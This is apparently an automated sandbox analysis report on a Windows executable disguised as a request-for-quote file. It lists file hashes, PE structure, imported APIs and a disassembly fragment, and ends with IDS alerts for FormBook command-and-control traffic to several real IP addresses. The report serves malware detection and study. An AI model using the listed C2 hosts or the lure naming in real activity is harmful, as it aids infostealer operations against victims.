                                                          MD5:DC65009C09E32006F25DC89C6EA841B5
                                                          SHA1:A7CA4E12E4A5CD538035325D7337169F374FE13F
                                                          SHA-256:C69DEF15B4A8572E0C478E5400A446C4DE1E5131524CAC0F877B447D06B78BE9
                                                          SHA-512:B8038BAF337840720C964F0079CE1AEE8491DC6D58D899181192A16331A75906A3DD8B75DF7795F5695CE22245C8F865EFA7F87FE99A824EB2A0DB281C973573
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:x..G7V49<YU9..L8.9JA3QPE.5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498Y.9N8B'.7J.:.q.Gy.j.\?G.H+:^<Y!.,X$/\%p'#.>>).?Z.|...#W(]a4GK.QPEF5LK>5_..X>..._../^.[....&R.Q..Y_.O...pX(..(P9m%!.LKG4V498..9NtM9O.<.lQPEF5LKG.V683X^9N`H8O9JA3QPE.!LKG$V49H]U9NxL8_9JA1QPCF5LKG4V298YU9N8LHK9JC3QPEF5NK..V4)8YE9N8L(O9ZA3QPEF%LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V4.L<-MN8LL.=JA#QPE.1LKW4V498YU9N8L8O9jA31PEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF
                                                          Process:C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):289280
                                                          Entropy (8bit):7.995185659865548
                                                          Encrypted:true
                                                          SSDEEP:6144:HQguu/yzuOTGI9vwq5uA0O0RCyoxcKdObV6Rds:Luky5Tkq5V0OZZxZSx
                                                          MD5:DC65009C09E32006F25DC89C6EA841B5
                                                          SHA1:A7CA4E12E4A5CD538035325D7337169F374FE13F
                                                          SHA-256:C69DEF15B4A8572E0C478E5400A446C4DE1E5131524CAC0F877B447D06B78BE9
                                                          SHA-512:B8038BAF337840720C964F0079CE1AEE8491DC6D58D899181192A16331A75906A3DD8B75DF7795F5695CE22245C8F865EFA7F87FE99A824EB2A0DB281C973573
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:x..G7V49<YU9..L8.9JA3QPE.5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498Y.9N8B'.7J.:.q.Gy.j.\?G.H+:^<Y!.,X$/\%p'#.>>).?Z.|...#W(]a4GK.QPEF5LK>5_..X>..._../^.[....&R.Q..Y_.O...pX(..(P9m%!.LKG4V498..9NtM9O.<.lQPEF5LKG.V683X^9N`H8O9JA3QPE.!LKG$V49H]U9NxL8_9JA1QPCF5LKG4V298YU9N8LHK9JC3QPEF5NK..V4)8YE9N8L(O9ZA3QPEF%LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V4.L<-MN8LL.=JA#QPE.1LKW4V498YU9N8L8O9jA31PEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF5LKG4V498YU9N8L8O9JA3QPEF
                                                          Process:C:\Windows\SysWOW64\bitsadmin.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                          Category:modified
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1215420383712111
                                                          Encrypted:false
                                                          SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                          MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                          SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                          SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                          SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.149332199987469
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:RFQ 3100185 MAHAD.exe
                                                          File size:1'216'000 bytes
                                                          MD5:9d6670fbee5ffd65a666a3238db4f622
                                                          SHA1:ea392d5a0a4007170be83b4d17ebd6d346b39629
                                                          SHA256:4a918ba2805dd458e2b776cae6fd6dd1a2a8ef1c4d8cbd02c2feaa69c49d4367
                                                          SHA512:0f1c0e1da310d593d1425564a1d3333487968d5c46b9581d2474ba6521fb9f96afffcbcb836b673bd321748ecd16e8276846cdbc28a607e6e9a3c52e6254248c
                                                          SSDEEP:24576:ctb20pkaCqT5TBWgNQ7altQqhh3RtVR43Y8nFlhh6A:FVg5tQ7almCRtVJ8nFlb5
                                                          TLSH:5645C01273DD8361C7B25273BA25B701BEBB782506B1F56B2FD8093DF920122525EA73
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                          Icon Hash:aaf3e3e3938382a0
                                                          Entrypoint:0x425f74
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x673D25FE [Tue Nov 19 23:57:50 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                          Instruction
                                                          call 00007F0A7886CC0Fh
                                                          jmp 00007F0A7885FC24h
                                                          int3
                                                          int3
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [esp+10h]
                                                          mov ecx, dword ptr [esp+14h]
                                                          mov edi, dword ptr [esp+0Ch]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007F0A7885FDAAh
                                                          cmp edi, eax
                                                          jc 00007F0A7886010Eh
                                                          bt dword ptr [004C0158h], 01h
                                                          jnc 00007F0A7885FDA9h
                                                          rep movsb
                                                          jmp 00007F0A788600BCh
                                                          cmp ecx, 00000080h
                                                          jc 00007F0A7885FF74h
                                                          mov eax, edi
                                                          xor eax, esi
                                                          test eax, 0000000Fh
                                                          jne 00007F0A7885FDB0h
                                                          bt dword ptr [004BA370h], 01h
                                                          jc 00007F0A78860280h
                                                          bt dword ptr [004C0158h], 00000000h
                                                          jnc 00007F0A7885FF4Dh
                                                          test edi, 00000003h
                                                          jne 00007F0A7885FF5Eh
                                                          test esi, 00000003h
                                                          jne 00007F0A7885FF3Dh
                                                          bt edi, 02h
                                                          jnc 00007F0A7885FDAFh
                                                          mov eax, dword ptr [esi]
                                                          sub ecx, 04h
                                                          lea esi, dword ptr [esi+04h]
                                                          mov dword ptr [edi], eax
                                                          lea edi, dword ptr [edi+04h]
                                                          bt edi, 03h
                                                          jnc 00007F0A7885FDB3h
                                                          movq xmm1, qword ptr [esi]
                                                          sub ecx, 08h
                                                          lea esi, dword ptr [esi+08h]
                                                          movq qword ptr [edi], xmm1
                                                          lea edi, dword ptr [edi+08h]
                                                          test esi, 00000007h
                                                          je 00007F0A7885FE05h
                                                          bt esi, 03h
                                                          jnc 00007F0A7885FE58h
                                                          movdqa xmm1, dqword ptr [esi+00h]
                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2012 UPD4 build 61030
                                                          • [RES] VS2012 UPD4 build 61030
                                                          • [LNK] VS2012 UPD4 build 61030
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5fda0.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x6c4c.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0xc40000x5fda00x5fe000af3e080777adbb5f4ab89148520780aFalse0.9317475757822686data7.9021512246328935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x1240000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                          RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                          RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                          RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                          RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                          RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                          RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                          RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                          RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                          RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                          RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                          RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                          RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                          RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                          RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                          RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                          RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                          RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                          RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                          RT_RCDATA0xcc7b80x570a5data1.0003253701787012
                                                          RT_GROUP_ICON0x1238600x76dataEnglishGreat Britain0.6610169491525424
                                                          RT_GROUP_ICON0x1238d80x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0x1238ec0x14dataEnglishGreat Britain1.15
                                                          RT_GROUP_ICON0x1239000x14dataEnglishGreat Britain1.25
                                                          RT_VERSION0x1239140xdcdataEnglishGreat Britain0.6181818181818182
                                                          RT_MANIFEST0x1239f00x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                          DLLImport
                                                          WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                          PSAPI.DLLGetProcessMemoryInfo
                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                          USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                          UxTheme.dllIsThemeActive
                                                          KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                          USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                          GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                          ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                          OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishGreat Britain
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-11-20T10:16:57.621627+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749894161.97.168.24580TCP
                                                          2024-11-20T10:16:57.621627+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749894161.97.168.24580TCP
                                                          2024-11-20T10:17:14.191219+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997027.124.4.24680TCP
                                                          2024-11-20T10:17:16.685677+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997127.124.4.24680TCP
                                                          2024-11-20T10:17:19.232575+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997227.124.4.24680TCP
                                                          2024-11-20T10:17:21.888857+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74997327.124.4.24680TCP
                                                          2024-11-20T10:17:21.888857+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74997327.124.4.24680TCP
                                                          2024-11-20T10:17:28.936069+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749974149.88.81.19080TCP
                                                          2024-11-20T10:17:31.498558+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749975149.88.81.19080TCP
                                                          2024-11-20T10:17:34.060878+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749976149.88.81.19080TCP
                                                          2024-11-20T10:17:56.483266+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749978149.88.81.19080TCP
                                                          2024-11-20T10:17:56.483266+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749978149.88.81.19080TCP
                                                          2024-11-20T10:18:03.248549+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997985.159.66.9380TCP
                                                          2024-11-20T10:18:05.795334+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74998085.159.66.9380TCP
                                                          2024-11-20T10:18:08.467622+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74998185.159.66.9380TCP
                                                          2024-11-20T10:18:10.267272+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74998285.159.66.9380TCP
                                                          2024-11-20T10:18:10.267272+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74998285.159.66.9380TCP
                                                          2024-11-20T10:18:15.987603+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749983185.27.134.14480TCP
                                                          2024-11-20T10:18:18.527337+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749984185.27.134.14480TCP
                                                          2024-11-20T10:18:21.096781+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749985185.27.134.14480TCP
                                                          2024-11-20T10:18:23.635241+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749986185.27.134.14480TCP
                                                          2024-11-20T10:18:23.635241+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749986185.27.134.14480TCP
                                                          2024-11-20T10:18:30.626021+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749987172.67.145.23480TCP
                                                          2024-11-20T10:18:33.219716+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749988172.67.145.23480TCP
                                                          2024-11-20T10:18:35.759091+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749989172.67.145.23480TCP
                                                          2024-11-20T10:18:38.295435+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749990172.67.145.23480TCP
                                                          2024-11-20T10:18:38.295435+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749990172.67.145.23480TCP
                                                          2024-11-20T10:18:44.381636+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749991188.114.97.380TCP
                                                          2024-11-20T10:18:46.887428+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749992188.114.97.380TCP
